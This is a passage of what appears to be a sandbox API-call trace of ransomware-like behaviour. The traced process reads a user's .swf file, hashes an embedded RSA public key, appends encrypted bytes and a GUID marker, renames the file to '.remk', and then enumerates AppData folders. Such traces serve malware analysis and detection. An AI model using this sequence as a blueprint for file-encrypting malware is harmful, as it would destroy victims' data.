hHeap=0x630000) returned 1 [0235.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\v0svWrNd01t99.swf") returned=".swf" [0235.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\v0svWrNd01t99.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\v0svwrnd01t99.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.720] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=96181) returned 1 [0235.720] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.723] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1778f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.723] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.725] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.725] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x177b5, lpOverlapped=0x0) returned 1 [0235.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.727] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695058) returned 1 [0235.728] CryptCreateHash (in: hProv=0x695058, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.728] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.728] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.728] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.728] GetLastError () returned 0x0 [0235.728] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.728] CryptReleaseContext (hProv=0x695058, dwFlags=0x0) returned 1 [0235.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.728] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.728] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.728] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x177c0) returned 0x37c6278 [0235.729] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d070 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc510 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.729] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.730] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x177b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.730] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.731] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.731] CloseHandle (hObject=0x640) returned 1 [0235.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0235.735] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\v0svWrNd01t99.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\v0svwrnd01t99.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\v0svWrNd01t99.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\v0svwrnd01t99.swf.remk")) returned 1 [0235.736] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe933d360, ftCreationTime.dwHighDateTime=0x1d5da34, ftLastAccessTime.dwLowDateTime=0x6e1e7430, ftLastAccessTime.dwHighDateTime=0x1d5d923, ftLastWriteTime.dwLowDateTime=0x6e1e7430, ftLastWriteTime.dwHighDateTime=0x1d5d923, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xB0W_x", cAlternateFileName="")) returned 1 [0235.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0235.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9b7c1e0, ftCreationTime.dwHighDateTime=0x1d5d9ea, ftLastAccessTime.dwLowDateTime=0x45e53620, ftLastAccessTime.dwHighDateTime=0x1d5e1d9, ftLastWriteTime.dwLowDateTime=0x45e53620, ftLastWriteTime.dwHighDateTime=0x1d5e1d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xq9EY6lNcW89ESh", cAlternateFileName="XQ9EY6~1")) returned 1 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6570 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0235.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed3ec350, ftCreationTime.dwHighDateTime=0x1d5e4b3, ftLastAccessTime.dwLowDateTime=0xf91dfa20, ftLastAccessTime.dwHighDateTime=0x1d5dc0b, ftLastWriteTime.dwLowDateTime=0xf91dfa20, ftLastWriteTime.dwHighDateTime=0x1d5dc0b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZCC-nq6c5y", cAlternateFileName="ZCC-NQ~1")) returned 1 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60f04910, ftCreationTime.dwHighDateTime=0x1d5e124, ftLastAccessTime.dwLowDateTime=0x58b54ab0, ftLastAccessTime.dwHighDateTime=0x1d5dc9d, ftLastWriteTime.dwLowDateTime=0x58b54ab0, ftLastWriteTime.dwHighDateTime=0x1d5dc9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_2KhhEZ4Uf5pHRY", cAlternateFileName="_2KHHE~1")) returned 1 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6570 [0235.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b68b8 [0235.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60f04910, ftCreationTime.dwHighDateTime=0x1d5e124, ftLastAccessTime.dwLowDateTime=0x58b54ab0, ftLastAccessTime.dwHighDateTime=0x1d5dc9d, ftLastWriteTime.dwLowDateTime=0x58b54ab0, ftLastWriteTime.dwHighDateTime=0x1d5dc9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_2KhhEZ4Uf5pHRY", cAlternateFileName="_2KHHE~1")) returned 0 [0235.737] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.738] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.738] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6950e0 [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0235.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.738] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.739] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.739] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.739] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.739] PathFindFileNameW (pszPath="") returned="" [0235.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6950e0 [0235.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0235.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed738 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.740] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0235.740] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.740] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.740] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0235.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0235.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.741] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.741] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.741] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.741] PathFindFileNameW (pszPath="") returned="" [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0235.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.741] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.741] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0235.742] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0235.742] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.742] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0235.742] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.742] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.743] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.743] PathFindFileNameW (pszPath="") returned="" [0235.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x3adfba4 | out: 